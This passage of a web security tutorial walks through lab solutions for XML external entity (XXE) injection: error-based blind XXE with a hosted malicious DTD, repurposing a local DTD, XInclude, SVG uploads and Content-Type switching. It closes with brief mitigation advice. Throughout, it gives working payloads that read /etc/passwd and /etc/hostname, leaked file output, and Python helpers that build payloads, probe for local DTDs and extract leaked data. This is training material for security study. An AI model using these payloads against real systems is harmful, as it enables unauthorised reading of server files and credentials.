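The reason the file contents end up in the error can be illustrated outside XML. The following is only an analogy in Python, not the parser's actual code: when a program tries to open a path built from a non-existent directory plus some secret text, the resulting "file not found" error typically quotes the full path, secret included. The function name and the sample value are made up.

```python
def leak_via_missing_path(secret):
    """Try to open a path that embeds `secret` and return the error text."""
    try:
        open("/nonexistent/" + secret)
    except FileNotFoundError as exc:
        # The error message includes the path that could not be found.
        return str(exc)
    return ""

print(leak_via_missing_path("demo-secret-value"))
```

An application that echoes parser errors back to the user exposes that path, and the data embedded in it, in the same way.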
LAB #6: Blind XXE To Retrieve Data Via Error Messages
This lab has a "Check stock" feature that parses XML input but does not display the result. Exploit Blind XXE injection attack to retrieve the content of the /etc/passwd file.
Solution
This lab is similar to the previous one in which we are restricted from using External Entities and Parameter-based entities. Attempting to use external entities results in an error message stating:
Entities are not allowed for security reasons
Similarly, if we try to use parameter-based entities and call them, the application responds with Invalid Product ID. However, when we attempt to make out-of-band interactions using the DOCTYPE with a payload like the following:
We notice interactions in our Burp Collaborator but on the web page, we encounter the following XML error:
XML parser exited with error: org.xml.sax.SAXParseException; systemId: http://kk8liddouirc66n48ft1ze4offl59u.oastify.com; lineNumber: 1; columnNumber: 2; The markup declarations contained or pointed to by the document type declaration must be well-formed.
In this case, the Burp Collaborator instance URL is reflected back in the error message. This suggests that we may be able to exfiltrate data using error messages. To proceed with the exploitation, we go to the exploit server and rename the file to exploit.dtd (or any other desired name), and then add the following payload to the request body:
<!ENTITY % file SYSTEM "file:///etc/passwd"><!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">%eval;%error;
After adding the above payload, we click on the "Store" button to save and host the file. We then copy the URL of exploit.dtd and use it to call the DTD file in our XML document as follows:
In the above payload, we use SYSTEM to call our exploit.dtd. The XML parser then parses that DTD file and eventually displays the error message containing the content of the /etc/passwd file, such as:
XML parser exited with error: java.io.FileNotFoundException: /nonexistent/root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
peter:x:12001:12001::/home/peter:/bin/bash
carlos:x:12002:12002::/home/carlos:/bin/bash
user:x:12000:12000::/home/user:/bin/bash
elmer:x:12099:12099::/home/elmer:/bin/bash
academy:x:10000:10000::/academy:/bin/bash
messagebus:x:101:101::/nonexistent:/usr/sbin/nologin
dnsmasq:x:102:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
systemd-timesync:x:103:103:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:104:105:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:105:106:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
mysql:x:106:107:MySQL Server,,,:/nonexistent:/bin/false
postgres:x:107:110:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
usbmux:x:108:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:109:115:RealtimeKit,,,:/proc:/usr/sbin/nologin
mongodb:x:110:117::/var/lib/mongodb:/usr/sbin/nologin
avahi:x:111:118:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
cups-pk-helper:x:112:119:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
geoclue:x:113:120::/var/lib/geoclue:/usr/sbin/nologin
saned:x:114:122::/var/lib/saned:/usr/sbin/nologin
colord:x:115:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
pulse:x:116:124:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
gdm:x:117:126:Gnome Display Manager:/var/lib/gdm3:/bin/false (No such file or directory)
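The leaked file sits between the /nonexistent/ prefix and the trailing "(No such file or directory)" text, so it can be cut out of the response automatically. The following is a small Python sketch that assumes the Java-style error format shown above; the helper name extract_leak is hypothetical, and other parsers will word their errors differently.

```python
import re

# Matches the Java-style error shown above and captures whatever the parser
# appended to the bogus /nonexistent/ path.
_LEAK = re.compile(
    r"FileNotFoundException: /nonexistent/(?P<leak>.*?)\s*\(No such file or directory\)",
    re.DOTALL,
)


def extract_leak(error_text: str):
    """Return the leaked file content, or None if the error has another shape."""
    match = _LEAK.search(error_text)
    return match.group("leak") if match else None


if __name__ == "__main__":
    sample = (
        "XML parser exited with error: java.io.FileNotFoundException: "
        "/nonexistent/root:x:0:0:root:/root:/bin/bash\n"
        "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin (No such file or directory)"
    )
    print(extract_leak(sample))
```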
Blind XXE By Redefining Element Of Local DTD
The technique described above for exploiting blind XXE vulnerabilities via error messages relied on hosting malicious DTD files. However, if the server blocked outbound connections to external servers, the attack could be completely mitigated.
To overcome this limitation, researchers discovered a way to exploit blind XXE using the internal DTD, even when the attacker cannot host or upload a malicious DTD file. The technique relies on a loophole in the XML specification: referencing a parameter entity within the definition of another parameter entity is allowed in external DTDs, but not in a fully internal DTD.
Arseniy Sharoglazov discovered that by using a hybrid of internal and external DTDs, it becomes possible to redefine entities declared in the external DTD within the internal DTD. This relaxation of the restriction allows for triggering error messages containing sensitive data.
To successfully complete this attack, there are certain conditions that need to be met. First, we need to redefine an entity from an external DTD file. However, since out-of-band connections are blocked, we cannot load any external DTD files directly. In this case, we can rely on previously existing external DTD files that are already present on the local filesystem of the application server.
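Once we identify an external DTD file on the local filesystem, we can redefine one of its entities within our internal DTD. We choose an entity that the external DTD both declares and references, so that our redefined value is expanded when the file is loaded. Because such DTD files usually ship with widely used software, we can study a copy taken from another system to find a suitable entity. By carefully crafting our XML payload, we can then trigger an error message that contains sensitive data.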
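For example, let's assume a DTD file is located at /usr/local/app/schema.dtd on the application server, and that this file defines an entity called custom_entity. We can trigger an error message containing the content of /etc/passwd with the following XXE payload:
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/local/app/schema.dtd">
<!ENTITY % custom_entity '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>
Because the exploit now sits inside an entity value in the internal DTD, its percent signs and single quotes are written as character references (&#x25;, &#x26;#x25;, and &#x27;). Left unescaped, they would end the quoted value early or be rejected by the parser.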
This DTD payload performs the following steps:
Defines an XML parameter entity called local_dtd, which contains the contents of the external DTD file existing on the server's filesystem.
Redefines the XML parameter entity called custom_entity from the external DTD file. The entity is redefined to include the error-based XXE exploit, as described earlier, for triggering an error message that contains the contents of the /etc/passwd file.
Uses the local_dtd entity, which causes the external DTD to be interpreted, including the redefined value of the custom_entity entity. This ultimately results in the desired error message being generated.
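The hardest part of these steps is getting the escaping right, since it depends on how deeply each declaration is nested. The following Python sketch assembles the DOCTYPE for a given local DTD, entity name, and target file. The function name build_local_dtd_doctype is hypothetical, and the sketch assumes the chosen entity is one the local DTD actually references.

```python
def build_local_dtd_doctype(local_dtd: str, entity: str, target_file: str) -> str:
    """Build a DOCTYPE that redefines `entity` from a DTD already on the server.

    Hypothetical helper for illustration; all three arguments are supplied by
    the tester after identifying a suitable local DTD and entity.
    """
    # Escaping by nesting depth:
    #   &#x25;      decodes to "%" when the redefined entity's value is read
    #   &#x26;#x25; decodes to "&#x25;" first, then to "%" inside the eval value
    #   &#x27;      stands in for "'" so the outer single-quoted value stays open
    inner = (
        f'<!ENTITY &#x25; file SYSTEM "file://{target_file}">'
        '<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM '
        '&#x27;file:///nonexistent/&#x25;file;&#x27;>">'
        "&#x25;eval;&#x25;error;"
    )
    return (
        "<!DOCTYPE foo [\n"
        f'<!ENTITY % local_dtd SYSTEM "file://{local_dtd}">\n'
        f"<!ENTITY % {entity} '{inner}'>\n"
        "%local_dtd;\n"
        "]>"
    )


if __name__ == "__main__":
    print(build_local_dtd_doctype("/usr/local/app/schema.dtd", "custom_entity", "/etc/passwd"))
```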
I hope you now have a good understanding of the attack concept and how to exploit it. However, you might be wondering how we can determine which external DTD files are present on the server. Researchers have also discovered a way to enumerate these files, and it's a fairly straightforward process. Since the application returns an error message when an invalid DTD file is loaded, we can use a dictionary attack approach to find a valid DTD on the server.
For instance, let's consider a Linux system using the GNOME desktop environment, which often has a DTD file located at /usr/share/yelp/dtd/docbookx.dtd. To check if this file exists on the system, we can use the following XML payload:
<!DOCTYPE foo [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd"> %local_dtd; ]>
By testing a list of common DTD files and checking if they are present, we can locate a file that exists on the server. Once we find a valid file, we need to obtain a copy of that file and review its contents to identify an entity that we can redefine. Since many common systems that include DTD files are open source, we can typically obtain copies of these files through internet searches or other reliable sources.
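The dictionary approach can be sketched in a few lines of Python. This is an illustration under stated assumptions rather than a finished tool: send is a caller-supplied function (hypothetical) that places the DOCTYPE in a request and returns the response body, the second candidate path is only an example entry, and the error strings match the Java-style messages shown in this article.

```python
CANDIDATE_DTDS = [
    "/usr/share/yelp/dtd/docbookx.dtd",     # mentioned in the text above
    "/usr/share/xml/fontconfig/fonts.dtd",  # illustrative extra entry (assumption)
]


def build_probe(dtd_path: str) -> str:
    """Return a DOCTYPE that only tries to load the given local DTD."""
    return f'<!DOCTYPE foo [ <!ENTITY % local_dtd SYSTEM "file://{dtd_path}"> %local_dtd; ]>'


def dtd_exists(response_body: str) -> bool:
    """Treat a file-not-found error as 'absent'; anything else as 'present'."""
    return (
        "FileNotFoundException" not in response_body
        and "No such file or directory" not in response_body
    )


def find_local_dtds(send, candidates=CANDIDATE_DTDS):
    """Return the candidate paths for which the server did not report a missing file."""
    return [path for path in candidates if dtd_exists(send(build_probe(path)))]
```

In practice, send would wrap an HTTP client call, and the candidate list would come from a published wordlist rather than the two entries used here.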
LAB #7: Exploiting XXE to retrieve data by repurposing a local DTD
This lab has a "Check stock" feature that parses XML input but does not display the result. Exploit Blind XXE injection to trigger an error message containing the contents of the /etc/passwd file. We'll need to reference an existing DTD file on the server and redefine an entity from it.
Solution
This lab is similar to the previous one, in which we used error messages to exfiltrate data. This time, however, we cannot host an external DTD file on an exploit server. The application still makes out-of-band connections to our Burp Collaborator instance, but when we host a malicious DTD file on the exploit server from a different lab and reference it to exfiltrate data through an error message, the request is blocked. Specifically, the application prevents DTD files from being loaded from external sources.
For example, when using the following payload, which was used successfully in the previous lab:
The application returns the following error message:
XML parser exited with error: java.net.UnknownHostException: exploit-0af600c1048e752781fd4cee01a0004c.exploit-server.net
As you can see, an UnknownHostException is occurring, which typically happens when the IP address of the host cannot be determined from the DNS server. This indicates that they are not allowing resolutions of links to the exploit server or taking some other measures to prevent external DTD hosting. While the application is making out-of-band interactions with our Burp Collaborator, we cannot utilize the Collaborator instance to host DTD files, and this lab does not involve out-of-band interactions with other external servers.
However, we can overcome this situation by repurposing local DTD files. The lab details indicate that the application is using the GNOME desktop environment, which often contains the file /usr/share/yelp/dtd/docbookx.dtd. We can verify its availability using the following XML payload:
In this scenario, if the file exists, we receive a simple response containing the stock information. However, if the file doesn't exist, the application throws the following error message:
XML parser exited with error: java.io.FileNotFoundException: /usr/share/yelp/dtd/docbook.dtd (No such file or directory)
To automate the process of finding DTD files and generating payloads, there are various tools available, and dictionary lists that can be used to fuzz DTD files that exist on the local system. More information related to this can be found in the PayloadsAllTheThings repository.
Since we know that the application has the local DTD file docbookx.dtd, we can repurpose it to exfiltrate the content of /etc/passwd by redefining one of its entities, ISOamso, so that loading the file throws an error message containing the target file's content. The payload will look like the following:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>
<stockCheck> <productId>1</productId> <storeId>1</storeId></stockCheck>
By sending the request using the above XXE payload, we can cause the application to return an error message containing the content of /etc/passwd.
XML parser exited with error: java.io.FileNotFoundException: /nonexistent/root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
peter:x:12001:12001::/home/peter:/bin/bash
carlos:x:12002:12002::/home/carlos:/bin/bash
user:x:12000:12000::/home/user:/bin/bash
elmer:x:12099:12099::/home/elmer:/bin/bash
academy:x:10000:10000::/academy:/bin/bash
messagebus:x:101:101::/nonexistent:/usr/sbin/nologin
dnsmasq:x:102:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
systemd-timesync:x:103:103:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:104:105:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:105:106:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
mysql:x:106:107:MySQL Server,,,:/nonexistent:/bin/false
postgres:x:107:110:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
usbmux:x:108:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:109:115:RealtimeKit,,,:/proc:/usr/sbin/nologin
mongodb:x:110:117::/var/lib/mongodb:/usr/sbin/nologin
avahi:x:111:118:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
cups-pk-helper:x:112:119:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
geoclue:x:113:120::/var/lib/geoclue:/usr/sbin/nologin
saned:x:114:122::/var/lib/saned:/usr/sbin/nologin
colord:x:115:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
pulse:x:116:124:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
gdm:x:117:126:Gnome Display Manager:/var/lib/gdm3:/bin/false (No such file or directory)
XXE Injection - Hidden Attack Surface
Various file formats and protocols are based on XML, such as Microsoft Excel documents, the OpenDocument Format (ODF), and the Simple Object Access Protocol (SOAP), among others. Applications that handle them parse XML data, which makes them susceptible to XXE injection attacks.
In web applications, XXE attacks are often straightforward because XML is commonly used as the primary method of data transfer or is supported by the application, allowing us to perform XXE injections easily.
However, performing XXE attacks on other applications may not be as straightforward. In some cases, we may not have full control over all the XML data we send, especially when an application accepts our data and places it inside a back-end SOAP request for processing. This limits our ability to add the DOCTYPE declaration used in previous XXE attacks.
Nevertheless, there is a potential solution using XInclude. XInclude is a standard XML feature that enables the inclusion and merging of XML documents within other XML documents. With XInclude, we can include specific portions of XML documents, such as elements or entire documents, by utilizing the <xi:include> element.
The advantage of using XInclude is that we can place it anywhere within the XML document, even if we don't have control over the entire document. This allows us to achieve similar objectives as classic XXE attacks. For instance, if we want to view the content of the /etc/passwd file, we can use the following payload:
<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>
<foo>: This is the root element of the XML document.
xmlns:xi="http://www.w3.org/2001/XInclude": This declares the XML namespace for XInclude.
An XML namespace is a way to uniquely identify elements and attributes in an XML document. It is a mechanism used to avoid naming conflicts between different XML vocabularies or schemas.
<xi:include parse="text" href="file:///etc/passwd"/>: This is the XInclude element that specifies the inclusion of an external resource.
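parse="text": This attribute specifies that the content of the included file should be treated as text. Without it, XInclude parses the included resource as XML by default, which would fail for a file such as /etc/passwd that is not well-formed XML.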
href="file:///etc/passwd": This attribute specifies the location of the file to include. In this case, it's the /etc/passwd file, which is a common file on Unix-based systems that contains user account information.
When the XML document containing this payload is processed, the XInclude mechanism will fetch the content of the /etc/passwd file and include it at the location of the <xi:include> element. The content of the file will be treated as text within the XML document.
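To see this inclusion step from the parser's side, the following Python sketch expands a parse="text" include with the standard library's xml.etree.ElementInclude module. It is a harmless local demonstration, not the lab's back end: the function name expand_text_include is made up, and the href is a plain filesystem path to a temporary file because the standard-library loader passes href directly to open().

```python
import os
import tempfile
import xml.etree.ElementTree as ET
from xml.etree import ElementInclude


def expand_text_include(path: str) -> str:
    """Parse a <foo> document with one xi:include and return the merged text."""
    doc = (
        '<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
        f'<xi:include parse="text" href="{path}"/>'
        "</foo>"
    )
    root = ET.fromstring(doc)
    # Replaces the xi:include child with the file's content, in place.
    ElementInclude.include(root)
    return root.text


if __name__ == "__main__":
    # Use a throwaway file instead of a real system file.
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as handle:
        handle.write("demo-secret\n")
    try:
        print(expand_text_include(handle.name))
    finally:
        os.unlink(handle.name)
```

Note that Python only performs XInclude processing when include() is called explicitly. Other parsers can be configured to do it automatically, which is what makes the attack possible.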
This lab's "Check stock" feature embeds the user's input into a server-side XML document that is subsequently parsed. Exploit the XXE injection attack to retrieve the content of the /etc/passwd file.
Solution
In this lab, the request does not visibly use XML for data transport. The Stock Check functionality is still present, but this time its request looks like the following:
POST /product/stock HTTP/2
Host: 0ad900bf033fd95c846196b3004c00a9.web-security-academy.net
Cookie: session=ttsesoKxVU43wCmvMkXhDNRgb43Wf7c6
Content-Length: 21
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
Content-Type: application/x-www-form-urlencoded
productId=1&storeId=1
As you can observe, they are using the Content-Type application/x-www-form-urlencoded. When we manually change the content type to XML and modify the request body accordingly, they respond with a missing parameter productId error. This indicates that they are not parsing XML data.
However, there is one more technique we can try, which is using XInclude XXE payloads. In case the application is using XML internally, but we cannot control the entire document, we can potentially use XInclude to exfiltrate data.
We can use this payload anywhere in the request where data is processed and displayed as a result. In this case, the productId parameter is processed to display stock information based on the specified product. Therefore, our request with the XInclude payload will look like this:
Request
POST /product/stock HTTP/2
Host: 0ad900bf033fd95c846196b3004c00a9.web-security-academy.net
Cookie: session=ttsesoKxVU43wCmvMkXhDNRgb43Wf7c6
Content-Length: 126
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
Content-Type: application/x-www-form-urlencoded
productId=<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>&storeId=1
As the response shows, we get the content of /etc/passwd, which means the application parses XML on the back end, although we control only part of that document rather than the whole of it. This technique lets us check whether an application processes XML internally even when it does not use XML explicitly for data transport.
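The request above sends the payload raw inside a form-encoded body. If an intermediary or the server mangles characters such as <, ", or &, percent-encoding the value is a reasonable thing to try. The following Python sketch builds such a body with the standard library; the helper name build_stock_body is hypothetical, and the parameter names come from the lab request.

```python
from urllib.parse import parse_qs, urlencode

XINCLUDE_PAYLOAD = (
    '<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
    '<xi:include parse="text" href="file:///etc/passwd"/>'
    "</foo>"
)


def build_stock_body(product_id: str, store_id: str = "1") -> str:
    """Return an application/x-www-form-urlencoded body for the stock check."""
    return urlencode({"productId": product_id, "storeId": store_id})


if __name__ == "__main__":
    body = build_stock_body(XINCLUDE_PAYLOAD)
    print(body)
    # Decoding the body gives back the original payload unchanged.
    print(parse_qs(body)["productId"][0] == XINCLUDE_PAYLOAD)
```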
XXE Injection Attacks Using File Uploads
Certain applications provide the functionality for users to upload files, which are subsequently processed on the server side. Within this context, various common file formats either utilize XML or incorporate XML sub-components. Notable examples of XML-based formats include office document formats like DOCX and image formats such as SVG.
To illustrate, consider an application that permits users to upload images, which are subsequently processed or validated on the server. Although the application may expect file formats such as PNG or JPEG, the image processing library it uses may also support SVG images. Since SVG is an XML-based format, an attacker can submit a malicious SVG image and reach a hidden attack surface for XXE vulnerabilities. For example, an SVG payload would look like the following:
<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>
Similarly, the same principle can be applied to office file formats. Attackers have the ability to embed XXE payloads within malicious office files, which can then be uploaded to the server. By doing so, they exploit the XML parsing functionality of the server-side application, potentially leading to XXE vulnerabilities and associated risks.
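The SVG payload shown above differs between targets only in the file it references, so it is easy to generate. The following is a minimal Python sketch; the function name build_svg_xxe is hypothetical.

```python
def build_svg_xxe(target_file: str) -> str:
    """Return an SVG document whose <text> element expands an external entity."""
    return (
        '<?xml version="1.0" standalone="yes"?>'
        f'<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file://{target_file}" > ]>'
        '<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" '
        'xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">'
        '<text font-size="16" x="0" y="16">&xxe;</text></svg>'
    )


if __name__ == "__main__":
    # Print the document; save it with an .svg extension before uploading.
    print(build_svg_xxe("/etc/hostname"))
```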
LAB #9: XXE Injection Attack Using Image File Upload
This lab has the functionality to upload an avatar image file and uses the Apache Batik library to process that image file. Exploit XXE injection attack by uploading a malicious SVG file that exfiltrates the content of the /etc/hostname file.
Solution
This lab is different from the previous ones because it involves a blogging application instead of a shopping application. The blogging application showcases various blog posts on different topics. Users can view each blog post and leave comments at the bottom of the page. Additionally, users can upload an avatar image that will be displayed with their comments. The request for making a comment with an image is structured as follows:
In the above request, you can see that they are using the Content-Type multipart/form-data, which is standard for file upload functionalities. The file upload feature may have its own issues, but in the context of XXE, it becomes significant because if the upload functionality parses XML data, we can upload malicious SVG files that exfiltrate the content of the /etc/hostname file.
The content of the SVG file is as follows:
<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>
As with a normal XXE payload, we use DOCTYPE to declare an external entity that refers to the /etc/hostname file. When we upload this SVG file as the avatar in the comment request, the back-end system parses it and resolves the external entity &xxe;, so the generated image contains the content of the /etc/hostname file.
Once the file is uploaded, if you open the image in the comments section, you will see that it displays the hostname of the back-end server. This indicates that the application is vulnerable to XXE injection, as it parsed the SVG file and resolved the external entity, leaking sensitive information.
XXE Attacks Via Modified Content-Type
In modern web applications, XML is no longer commonly used for data transport. JSON has become the preferred format due to its reliability and simplicity. However, it's still worth checking whether an application accepts XML data, even if it normally uses a different Content-Type such as application/json or application/x-www-form-urlencoded.
You can manually modify the Content-Type header to application/xml and replace the data with XML content to see if the application accepts it. Surprisingly, you may find that some applications still allow XML data.
For instance, if a normal request looks like this:
POST /action HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
foo=bar
You might be able to submit the following request with the same result:
POST /action HTTP/1.0
Content-Type: text/xml
Content-Length: 52
<?xml version="1.0" encoding="UTF-8"?><foo>bar</foo>
If the application accepts this XML request, you can proceed to explore and exploit any potential vulnerabilities using the techniques you have learned so far.
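The conversion between the two requests above can be sketched in Python. The helper name form_to_xml and the wrapper element name root are assumptions: a single field becomes the document element, as in the example, while several fields need some enclosing element whose real name depends on the application.

```python
from urllib.parse import parse_qsl
from xml.sax.saxutils import escape

XML_DECL = '<?xml version="1.0" encoding="UTF-8"?>'


def form_to_xml(form_body: str, wrapper: str = "root") -> str:
    """Convert a form-encoded body into an equivalent XML body (hypothetical helper)."""
    pairs = parse_qsl(form_body, keep_blank_values=True)
    # Escape &, < and > in values so they do not break the XML syntax.
    elements = "".join(f"<{name}>{escape(value)}</{name}>" for name, value in pairs)
    if len(pairs) == 1:
        return XML_DECL + elements
    return f"{XML_DECL}<{wrapper}>{elements}</{wrapper}>"


if __name__ == "__main__":
    body = form_to_xml("foo=bar")
    print(body)
    # The byte length is the value to send in the Content-Length header.
    print(len(body.encode("utf-8")))
```

For foo=bar this reproduces the 52-byte body from the example request.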
Keep in mind that XML is just a data transfer format. Make sure you also test any XML-based functionality for other vulnerabilities like XSS and SQL injection. You may need to encode your payload using XML escape sequences to avoid breaking the syntax, but you may also be able to use this to obfuscate your attack in order to bypass weak defenses.
XXE Protections
XXE vulnerabilities can be effectively mitigated by disabling the XML features that are commonly exploited by attackers. Most XXE vulnerabilities occur because the application's XML parsing library supports dangerous XML features that are not required or intended for use in the application. By disabling these features, the risk of XXE attacks can be greatly reduced.
The two main features that should be disabled to prevent XXE attacks are the resolution of external entities and the support for XInclude. These features can often be disabled through configuration options or by programmatically overriding the default behavior of the XML parsing library. It is important to consult the documentation specific to your XML parsing library or API to understand how to disable these unnecessary capabilities effectively.
By disabling the resolution of external entities and XInclude support, you can significantly enhance the security of your application against XXE attacks. Implementing these protections should be a standard practice when working with XML parsing libraries or APIs to safeguard your application and its data.
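How these features are switched off depends on the parser, so the following is only one possible approach, sketched in Python with the standard library's expat bindings: reject any document that carries a DOCTYPE declaration, which removes external entities and the DTD-based techniques above in one step. The names parse_untrusted and DoctypeForbidden are made up for this example. It does not cover XInclude, which Python's standard library only processes when explicitly asked to.

```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when untrusted XML carries a DOCTYPE declaration."""


def parse_untrusted(xml_bytes: bytes) -> list:
    """Parse XML, refusing any DOCTYPE, and return the element names seen."""
    elements = []
    parser = xml.parsers.expat.ParserCreate()

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        # Called as soon as "<!DOCTYPE" is seen, before any entity is declared.
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.StartElementHandler = lambda tag, attrs: elements.append(tag)
    parser.Parse(xml_bytes, True)
    return elements


if __name__ == "__main__":
    print(parse_untrusted(b"<stockCheck><productId>1</productId></stockCheck>"))
    try:
        parse_untrusted(
            b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>'
        )
    except DoctypeForbidden as exc:
        print("rejected:", exc)
```

Applications that genuinely need DTDs cannot use this blunt approach and should instead disable external entity resolution through their parser's own configuration options.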